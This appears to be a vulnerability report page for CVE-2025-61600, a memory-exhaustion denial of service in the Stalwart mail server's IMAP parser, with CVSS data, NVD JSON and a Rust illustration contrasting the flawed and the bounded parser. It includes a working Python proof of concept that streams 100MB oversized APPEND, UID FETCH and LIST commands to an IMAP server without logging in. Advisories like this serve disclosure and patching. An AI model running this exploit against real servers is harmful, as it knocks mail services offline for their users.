Security Vulnerability Report
CVE-2025-61600 CVSS 7.5 HIGH

CVE-2025-61600

Published: 2025-10-02 22:15:38
Last Modified: 2026-04-15 00:35:42

Description

Stalwart is a mail and collaboration server. Versions 0.13.3 and below contain an unbounded memory allocation vulnerability in the IMAP protocol parser which allows remote attackers to exhaust server memory, potentially triggering the system's out-of-memory (OOM) killer and causing a denial of service. The CommandParser implementation enforces size limits on its dynamic buffer in most parsing states, but several state handlers omit these validation checks. This issue is fixed in version 0.13.4. A workaround for this issue is to implement rate limiting and connection monitoring at the network level, however this does not provide complete protection.
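The description gives the bug class (a size limit enforced in most parser states but omitted in some) without naming the affected states. The block below is an added illustrative example, not Stalwart's code or its fix: a miniature IMAP command parser with a per-byte dynamic buffer whose `max_request_size` bound is applied to tags, commands and bare arguments but, in the mode labelled vulnerable, skipped inside quoted strings; the hardened mode routes every state through the same bounded push. The state names, the `max_request_size` parameter, the `hardened` switch and the simplified grammar (no `{n}` literals, one command per `feed` call) are assumptions made for illustration.

```rust
// Added illustrative example (not Stalwart's code): a toy IMAP command parser
// whose argument buffer is bounded in most states but, in "vulnerable" mode,
// not inside quoted strings. State names, the limit and the grammar are assumed.

#[derive(Debug, Clone, Copy)]
enum State {
    Tag,          // e.g. "A001"
    Command,      // e.g. "APPEND"
    Argument,     // bare atom: sequence set, flag list, "{1024}" token ...
    Quoted,       // inside "..." (the oversized mailbox name in the PoC)
    QuotedEscape, // byte following a backslash inside "..."
}

#[derive(Debug, PartialEq)]
pub enum ParseError {
    RequestTooLarge,
}

#[derive(Debug, Default, PartialEq)]
pub struct Request {
    pub tag: String,
    pub command: String,
    pub args: Vec<String>,
}

pub struct CommandParser {
    state: State,
    buf: Vec<u8>,            // dynamic buffer: grows one byte per input byte
    peak_buf: usize,         // high-water mark of `buf`, i.e. memory really used
    request: Request,
    max_request_size: usize, // assumed per-token limit
    hardened: bool,          // false reproduces the missing check in quoted states
}

impl CommandParser {
    pub fn new(max_request_size: usize, hardened: bool) -> Self {
        CommandParser {
            state: State::Tag,
            buf: Vec::new(),
            peak_buf: 0,
            request: Request::default(),
            max_request_size,
            hardened,
        }
    }

    pub fn peak_buffer_len(&self) -> usize {
        self.peak_buf
    }

    // Raw append with no bound: the vulnerable pattern when reached directly.
    fn grow(&mut self, b: u8) {
        self.buf.push(b);
        self.peak_buf = self.peak_buf.max(self.buf.len());
    }

    // The check most state handlers carry: refuse to grow past the limit.
    fn push_bounded(&mut self, b: u8) -> Result<(), ParseError> {
        if self.buf.len() >= self.max_request_size {
            return Err(ParseError::RequestTooLarge);
        }
        self.grow(b);
        Ok(())
    }

    // Quoted-string states: bounded only in hardened mode.
    fn push_quoted(&mut self, b: u8) -> Result<(), ParseError> {
        if self.hardened {
            self.push_bounded(b)
        } else {
            self.grow(b); // unbounded: one long token can grow until OOM
            Ok(())
        }
    }

    fn take_buf(&mut self) -> String {
        let bytes = std::mem::take(&mut self.buf);
        String::from_utf8_lossy(&bytes).into_owned()
    }

    fn finish(&mut self) -> Request {
        if !self.buf.is_empty() {
            let arg = self.take_buf();
            self.request.args.push(arg);
        }
        self.state = State::Tag;
        std::mem::take(&mut self.request)
    }

    /// Feed bytes as they arrive. Ok(Some(req)) once a full line is parsed,
    /// Ok(None) if more input is needed, Err if a bounded state overflowed.
    pub fn feed(&mut self, bytes: &[u8]) -> Result<Option<Request>, ParseError> {
        for &b in bytes {
            match self.state {
                State::Tag => match b {
                    b' ' => {
                        self.request.tag = self.take_buf();
                        self.state = State::Command;
                    }
                    _ => self.push_bounded(b)?,
                },
                State::Command => match b {
                    b' ' => {
                        self.request.command = self.take_buf();
                        self.state = State::Argument;
                    }
                    b'\r' => {}
                    b'\n' => {
                        self.request.command = self.take_buf();
                        return Ok(Some(self.finish()));
                    }
                    _ => self.push_bounded(b)?,
                },
                State::Argument => match b {
                    b'"' if self.buf.is_empty() => self.state = State::Quoted,
                    b' ' => {
                        if !self.buf.is_empty() {
                            let arg = self.take_buf();
                            self.request.args.push(arg);
                        }
                    }
                    b'\r' => {}
                    b'\n' => return Ok(Some(self.finish())),
                    _ => self.push_bounded(b)?,
                },
                State::Quoted => match b {
                    b'"' => {
                        let arg = self.take_buf();
                        self.request.args.push(arg);
                        self.state = State::Argument;
                    }
                    b'\\' => self.state = State::QuotedEscape,
                    _ => self.push_quoted(b)?,
                },
                State::QuotedEscape => {
                    self.push_quoted(b)?;
                    self.state = State::Quoted;
                }
            }
        }
        Ok(None)
    }
}

fn main() {
    // Constructed input modelled on the page's PoC: APPEND with an oversized quoted mailbox.
    let payload = format!("A001 APPEND \"{}\" (\\Seen)\r\n", "A".repeat(4096));
    for hardened in [false, true] {
        let mut parser = CommandParser::new(512, hardened);
        let outcome = parser.feed(payload.as_bytes());
        println!(
            "hardened={} -> {:?}, peak buffer {} bytes (limit 512)",
            hardened,
            outcome.map(|r| r.map(|req| req.args.len())),
            parser.peak_buffer_len()
        );
    }
}
```

The `peak_buffer_len` high-water mark is the quantity that decides the OOM outcome: in the vulnerable mode it equals whatever token length the client chooses, in the hardened mode it never exceeds the limit. A bare-atom argument of the same size is rejected in both modes, which is the "most states enforce the limit" half of the description. The bound has to fire at parse time, before any LOGIN is evaluated or a command is dispatched, which is consistent with PR:N in the CVSS vector.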

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No NVD configuration (CPE) data is available for this CVE. Affected range per the advisory text:

Stalwart Mail Server <= 0.13.3 (fixed in 0.13.4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61600 PoC - Stalwart IMAP Parser Memory Exhaustion
# This PoC demonstrates the unbounded memory allocation vulnerability
# in Stalwart's IMAP CommandParser by sending commands with oversized
# parameters. The advisory does not name which parser states lack the
# buffer size check, so three common command shapes are tried in turn.
# No LOGIN is sent: the CVSS vector has PR:N, so the oversized command
# is expected to be buffered before authentication is evaluated.

import socket
import ssl
import sys
import time

TARGET_HOST = "victim.example.com"
TARGET_PORT = 143  # IMAP port (or 993 for IMAPS)
USE_SSL = False
PAYLOAD_SIZE = 100 * 1024 * 1024  # 100MB payload to exhaust memory


def connect():
    """Open a plain or TLS connection and consume the server greeting."""
    sock = socket.create_connection((TARGET_HOST, TARGET_PORT), timeout=30)
    if USE_SSL:
        context = ssl.create_default_context()
        sock = context.wrap_socket(sock, server_hostname=TARGET_HOST)
    greeting = sock.recv(1024)
    print(f"[*] Server greeting: {greeting.decode(errors='replace').strip()}")
    return sock


def send_oversized(sock, command):
    """Stream the whole command; sendall() handles chunking internally."""
    print(f"[*] Sending oversized command ({len(command)} bytes)...")
    sock.sendall(command)
    time.sleep(2)
    sock.close()


def exploit_append_command():
    """Candidate 1: APPEND with a very long quoted mailbox name."""
    oversized_mbox = "A" * PAYLOAD_SIZE
    # {1024} announces a 1024-byte literal; the parser never gets that far.
    command = f'A001 APPEND "{oversized_mbox}" (\\Seen) {{1024}}\r\n'
    send_oversized(connect(), command.encode())


def exploit_uid_command():
    """Candidate 2: UID FETCH with an extremely long sequence set."""
    oversized_seq = "1," * (PAYLOAD_SIZE // 2) + "1"
    command = f"A002 UID FETCH {oversized_seq} (FLAGS)\r\n"
    send_oversized(connect(), command.encode())


def exploit_list_command():
    """Candidate 3: LIST with an oversized quoted mailbox pattern."""
    oversized_pattern = "*" * PAYLOAD_SIZE
    command = f'A003 LIST "" "{oversized_pattern}"\r\n'
    send_oversized(connect(), command.encode())


if __name__ == "__main__":
    print(f"[*] CVE-2025-61600 PoC - Targeting {TARGET_HOST}:{TARGET_PORT}")
    try:
        exploit_append_command()
        time.sleep(1)
        exploit_uid_command()
        time.sleep(1)
        exploit_list_command()
        print("[*] Exploit payloads sent. Check target server memory status.")
    except Exception as e:
        print(f"[!] Error: {e}")
        sys.exit(1)

References

https://github.com/stalwartlabs/stalwart/security/advisories/GHSA-8jqj-qj5p-v5rr (GitHub Security Advisory)
https://github.com/stalwartlabs/stalwart/commit/a8e631e881bded8128358732f18e02ca94a4e677 (fix commit)
https://github.com/stalwartlabs/stalwart/releases/tag/v0.13.4 (fixed release)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-61600",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-02T22:15:38.063",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Stalwart is a mail and collaboration server. Versions 0.13.3 and below contain an unbounded memory allocation vulnerability in the IMAP protocol parser which allows remote attackers to exhaust server memory, potentially triggering the system's out-of-memory (OOM) killer and causing a denial of service. The CommandParser implementation enforces size limits on its dynamic buffer in most parsing states, but several state handlers omit these validation checks. This issue is fixed in version 0.13.4. A workaround for this issue is to implement rate limiting and connection monitoring at the network level, however this does not provide complete protection."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-400"},
          {"lang": "en", "value": "CWE-789"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/stalwartlabs/stalwart/commit/a8e631e881bded8128358732f18e02ca94a4e677", "source": "[email protected]"},
      {"url": "https://github.com/stalwartlabs/stalwart/releases/tag/v0.13.4", "source": "[email protected]"},
      {"url": "https://github.com/stalwartlabs/stalwart/security/advisories/GHSA-8jqj-qj5p-v5rr", "source": "[email protected]"}
    ]
  }
}